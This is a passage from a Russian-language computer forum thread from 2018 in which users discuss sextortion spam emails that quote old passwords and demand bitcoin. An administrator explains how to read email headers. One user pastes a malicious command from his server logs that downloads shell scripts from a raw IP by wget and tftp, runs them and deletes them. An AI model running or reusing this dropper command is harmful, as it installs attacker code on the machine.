Авторизация
Ник
Пароль:

Вирусы
Список конференций  Список ТемСоздать новую тему  Добавить свой ответ
VirusHunter (Администратор)

Подкорректируйте, пожалуйста, ссылки источников информации, на которые Вы ссылаетесь в своём комментарии - такие страницы не существуют.
 08.10.2018 02:24 
Grot666 (Ученик)

Боюсь не получится. Я просто скопировал текст с одного сайта.2. Как сказал один чувак. Если бы у них были все пароли они бы банковские счета чистили, а не ждали когда им переведет один чувак из тысячи. Я на всякий случай сменил пароль от Приват 24, но понимаю что они не имеют доступ. Даже указав пароль в письме он не соответствует логину. Логин взят с другого сайта. 3.  И вообще как вы уже говорили в письме куча нестыковок. Почту не ломали, логин и пароль не во всех случаях совпадают, даты заражения меняются, у многих нет камер, но им приходит тот же шаблон что и остальным. Если бы у них были факты того, что тебя записывали, они бы выложили куда-то и дали ссылку. Так чаще всего делают шантажисты с теми кого записали по дурости . Схема. Девушка предлагает вирт, дает скайп, они общаются и нк только. Компромат готов. Чувак один писал, что ему на следующий день пришла ссылкк на закрытое видео в ютюбе. 
 08.10.2018 03:17 

Ну, это уже от ума человека зависит. Если он виртуальным сексом (или чем-то подобным) открыто занимается в онлайне с незнакомым партнёром - посредством видео трансляции, или высылает свои интимные фото (при этом ещё и с наличием своего лица) первому встречному - вероятность стать "звездой" Интернета очень высока.
P.S. Ошибки в Ваших последних двух комментариях исправил, ссылки на несуществующие страницы удалил. Смайлики вставлять в текст не нужно - они тут у нас не отображаются.
 08.10.2018 05:00 
Grot666 (Ученик)

https://www.bitcoinabuse.com/reports/1CMQMKmvT4hz2k2ijyxVxN7fHS62K7uQ7z?page=11 Тут огромное кол-во людей, которые пожаловались . Есть даже чувак из Японии. 
 08.10.2018 08:00 
Grot666 (Ученик)

Два дня ничего не приходло. Вот сейчас получил опять 2 письма.Кошелек 1F5csJmyf3yJs5s25tZmYKoFXznR452er9
 09.10.2018 06:06 
Grot666 (Ученик)

Within a period from July 30, 2018 to October 9, 2018
Они походу не соображают, что отправляли письма с 25 сентября. Уже пишут до 9 октября)
 11.10.2018 02:47 
NN (Ученик)

Привет! Сегодня тоже получила письмо. Пароль был не верный. Спасибо, что подняли эту тему!
 11.10.2018 12:48 
zazias (Ученик)

Письма получил аналогичные. Тоже старые пароли от аськи.

Но есть одно НО...
У меня сервер VDS, так вот письма эти не просто ЯКОБЫ от моего ящика отправлены, а точно с моего. В заголовках у отправителя фигурирует IP моего сервера.
Далее я заглянул на сервере в логи и увидел действительно отправку этих писем.

Так же в логах увидел выполнение команды
cd /tmp; wget http://209.250.234.19/bins.sh; chmod 777 *; sh bins.sh; tftp -g 209.250.234.19 -r tftp.sh; chmod 777 *; sh tftp.sh; rm -rf *.sh
Но пароль от сервера свежий, начал его использовать не так давно.
Получается, кто-то ломанул мой сервер и чтобы еще больше напугать меня, отправили именно с моего сервера.
Но вот как проникли на сервер я не могу догадаться.
 11.10.2018 22:45 

Уважаемый zazias, в заголовке писем Вы ощибочно приняли за сервер отправки сервер доставки писем. Они разные. С учётом того, что школота, рассылающая письма "счастья", не в курсе, что через сервер отправки можно вычислить, в конечном счёте, через какого провайдера работает злоумышленник, фальсификация исходного IP отправки писем, завуалированного под реальный почтовый сервер Вашего провайдера, исключена (к тому же, они его просто не могут заранее знать, а играться для уточнения этих данных точно не станут, поскольку на это нужно лишнее время + эти вещи они явно не знают, раз шлют всё в открытом виде).
P.S. Скиньте, пожалуйста, несколько образцов заголовков писем нам в "Контакты" - посмотрю, что там у Вас прописали сервера. Когда будете скидывать, просьба указать, что для Германа, а то коллеги сразу не поймут о чём речь и для чего заголовки писем переслали.
 12.10.2018 04:43 
Grot666 (Ученик)

Ни кто вас не ломанул. ваш емейл попал в сотни тысяч адресов на которые рассылается спам с подменой почтового адреса. Еще можете посмотреть, есть ли в отправленных эти письма. (если совсем параноя)
 12.10.2018 05:03 
Страницы: 1  2  3  4  5  6  7  8  

Пришло время электрокаров!
Новости, обзоры, видео, все об электромобилях Tesla на форуме TeslaTime.com.ua.

Добро пожаловать на наш Компьютерный Форум. Здесь Вы можете задавать свои вопросы касательно работы компьютера и его комплектующих, программного обеспечения и софта.
Всегда рады Вам помочь!!!
Rambler's Top100

0.0114200115204